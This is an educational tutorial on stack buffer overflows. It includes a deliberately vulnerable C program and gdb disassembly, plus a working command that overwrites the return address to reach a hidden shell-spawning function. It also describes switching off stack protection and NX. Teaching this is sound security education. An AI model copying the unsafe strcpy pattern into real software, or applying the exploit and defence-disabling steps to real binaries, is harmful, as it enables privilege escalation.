A Foundation for Buffer Overflow Attacks

Buffer overflows are some of the oldest and most important attacks against computer systems. They are commonly associated with low-level languages (like C and C++), but are not exclusive to them. Despite the importance of this type of attack, a large number of technical people still don't fully understand it. Hopefully, this article will give you some basic insight into how buffer overflows work and why they are both useful and dangerous. It only covers the basic concepts behind these attacks, so please bear in mind: because of the protection mechanisms built into modern systems, it is much more difficult to exploit them this way than it used to be. (If you are reading this to play The Hacker's Sandbox, then everything here is still applicable.)

So what is a buffer overflow?

Buffer overflows are attacks that change the logical flow of an application in a way its designers never intended. When information needs to be stored in memory, it will land either on the stack or (for long-term and dynamic data) on the heap. (This article deals specifically with stack overflows, though similar concepts apply to the heap as well.) The stack is a region of memory that gets created for every thread that your application is running. It works using a Last-In, First-Out (LIFO) model, where data is said to be either pushed onto or popped off of the stack. When an application wants to store data in a local buffer, it allocates memory on the stack for that purpose. That data can later be manipulated or moved to the heap as needed. The danger comes when the application tries to write more data than has been allocated for the buffer. In this instance, the application can overwrite other important locations in memory, corrupting the program's state or changing its logical flow.

Examining the stack

To understand this a little better, let's take a look at an abstraction of the stack. You can easily visualize the stack using the following parts:

[BUFFER][STACK_FRAME_POINTER][RETURN_ADDRESS]

Imagine that you have three cards that you want to put down in the buffer: Card A, Card B, and Card C. You can push them down one at a time, first Card A, then Card B, and last Card C. You will now have a buffer on the stack that looks like this:

Card C
Card B
Card A

If you then wanted to access Card B, you would first have to pop Card C off of the stack. This is the basis for memory management on the stack, and it is crucial to understanding buffer overflows. We can take this a step further and see how a real-world function would work with the stack.

I am going to use the mmap() system function exposed by the Linux kernel. Looking at the man pages, you can see the function looks like this:

void *mmap(
    void *addr,
    size_t length,
    int prot,
    int flags,
    int fd,
    off_t offset
);

If we were to call this function using the classic 32-bit x86 C calling convention, we would push each argument onto the stack in reverse order and then make the call to mmap(). The call itself pushes the address to return to. (The return value, a void * pointer in this case, is handed back in a register, so nothing is pushed for it.) Abstractly, it would look something like this:

PUSH off_t offset
PUSH int fd
PUSH int flags
PUSH int prot
PUSH size_t length
PUSH void *addr
CALL mmap

Once finished, the arguments on our stack will look like this, starting from the top:

void *addr
size_t length
int prot
int flags
int fd
off_t offset

Don't worry about the actual data here. The important part is that you understand how the stack works, so that you can understand how to exploit it. This is all well and good, but how does it actually help you to control the flow of a program? Well, in addition to holding the buffer, the stack also holds a frame pointer and the address to return to after a function has finished executing. Let's take another look at that stack:

[BUFFER][STACK_FRAME_POINTER][RETURN_ADDRESS]

Did you notice it? The buffer is placed on the stack before the return address. If we could keep writing data into the buffer until it overflows into the RETURN_ADDRESS, we would change where the program thinks it should jump back to.

A little bit of math

OK, so now we know the theory behind overflowing buffers, but how do we know how much data we actually need to exploit this? The truth is, that depends on a few factors, such as your architecture. Computers of different architectures will follow this same stack model, but their memory allocation won't always be the same. In the simplified model used here, every machine architecture has a minimum amount of storage it can allocate. Think of it in terms of blocks. A system can only reserve whole blocks. If your program were to request only half a block worth of data, the system would need to reserve a full block to satisfy that request.

On a 32-bit system, this block is going to be 32 bits. On a 64-bit system, each block will be 64 bits.

So if we were to request 1 byte of data (8 bits) on a 32-bit system, we would end up reserving 4 bytes (32 bits), while on a 64-bit system we would end up reserving 8 bytes (64 bits).

In order to actually change the RETURN_ADDRESS, first we would need to fill our complete buffer (all of the space reserved for us), then we would need to overwrite the STACK_FRAME_POINTER (this will usually be 1 block of space), and finally we would be able to overwrite the RETURN_ADDRESS (also 1 block in size).

To complicate matters further, modern compilers will often pad buffers. The amount of padding depends on various factors (such as data type and size) and affects the reserved memory size. Often, the easiest way to determine how large your buffer really is would be to open your application in a debugger and look at the assembly. If you are playing The Hacker's Sandbox, assume that there is no padding from the compiler.

Some practical examples

The following is a small C application (overflow.c) which has no measures in place to protect it from buffer overflows.

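#include <string.h>
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
    char buf[10];
    /* Deliberately unsafe: strcpy() does not check the size of buf. */
    strcpy(buf, argv[1]);
    return 0;
}

/* Never called by the program itself. */
void the_shell()
{
    printf("pwned!\n");
    system("/bin/sh");
}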

This program is pretty simple. It takes the first argument passed to the program and copies it into a buffer that is 10 bytes long. Notice that there is also a function called the_shell() which never actually gets called. The code inside of it, however, would spawn a shell running as the owner of the program (for example, when the binary is installed setuid). (The truth is, this would be a pretty useless program in real life, but it suits our demonstration very well.)

We can easily compile this into a program called overflow. For the purposes of this demonstration, we will be compiling on a 32-bit architecture:

$ gcc -o overflow overflow.c

Note: This compile would be incomplete on a modern machine. Modern toolchains, like gcc, have multiple mechanisms in place, like a stack guard and NX memory regions, which you would need to disable and/or bypass in order to successfully exploit your binaries. (With gcc, for example, the -fno-stack-protector option turns off the stack guard.)

Now, we can try playing around with this for a bit. If we pass an argument of 10 characters (say 0000000000), we will notice the program does nothing and simply exits. However, if we pass a much longer argument, of say 30 characters, it will crash. The application crashes because key pieces of data become corrupted (like our return address, which likely now points to a nonexistent region of memory), and the logical flow of the program cannot continue. So how do we send just enough data to overflow the buffer and change the flow of execution without crashing the program? Let's try to fill the stack just enough to trick it into returning to our hidden function the_shell(). Conceptually, we will need to fill the stack so it looks like this on our 32-bit system:

[garbage data] 12 bytes [garbage data] 4 bytes [address of the_shell] 4 bytes

Remember, when the buffer requests 10 bytes, the smallest number of 32-bit blocks (4 bytes each) that can hold it is 3. Thus, 4 bytes x 3 = 12 bytes.

First, we would fire up our binary in a debugger. We'll use gdb for this example; just launch it against our executable to get an interactive debugging shell:

$ gdb overflow
(gdb)

We know from our source example that we want to try to find the location of the_shell() to fire off our attack. We can simply use gdb's disassembly command to dump out that function, and see what address the beginning of the function has been mapped to.

(gdb) disas the_shell
Dump of assembler code for function the_shell:
   0x080484a4 <+0>: push %ebp
   0x080484a5 <+1>: mov %esp,%ebp
   0x080484a7 <+3>: sub $0x18,%esp
   0x080484aa <+6>: movl $0x8048560,(%esp)
   0x080484b1 <+13>:    call 0x8048350 <puts@plt>
   0x080484b6 <+18>:    movl $0x8048567,(%esp)
   0x080484bd <+25>:    call 0x8048360 <system@plt>
   0x080484c2 <+30>:    leave  
   0x080484c3 <+31>:    ret    
End of assembler dump.
(gdb)

Here, we can see that the entry point for the_shell is 0x080484a4. We're almost there! Before we can execute our attack, we need to get the bytes of that address onto the stack in the correct order. x86 is a little-endian architecture, which means the least significant byte of a multi-byte value is stored at the lowest memory address, and strcpy() copies our input into memory 1 byte at a time starting from the lowest address. As a result, the bytes are going to look reversed in a dump compared to the way we would write the address. Therefore, we are going to need to input the bytes (one at a time) in reverse order: 0xa4 0x84 0x04 0x08

Putting this all together

Finally, we're ready to launch the attack. We'll need to send garbage data to overflow the buffer (12 bytes for the buffer + 4 bytes for the SFP), and then our payload. We can easily just use 0's for our garbage data. Unfortunately, the bytes of our address (0x08 and 0x04, for example) are not printable characters, so we will need to find some way to inject these bytes into our program. A lot of hackers tend to like using a C, Perl, or Python program to do this. Personally, I just tend to use the echo command inside my Bash shell (but feel free to use whatever suits you best). The -e flag tells echo to interpret escape sequences in my strings, and -n suppresses the trailing newline character.

$ ./overflow 0000000000000000$(echo -ne "\xa4\x84\x04\x08")
pwned!
$

Success! We've been able to alter the flow of execution in our binary to run the hidden shell code.

Again, if you are trying this on a modern system, there are a few more safeguards that need to be taken into consideration before this will work. For example, you would probably need to disable the NX flag on your binaries (you can use execstack on Linux systems to do this). But if you are playing The Hacker's Sandbox, you won't need to worry about any of that.

For additional information on running buffer overflows against modern systems, I would recommend reading Smashing the Stack in 2011.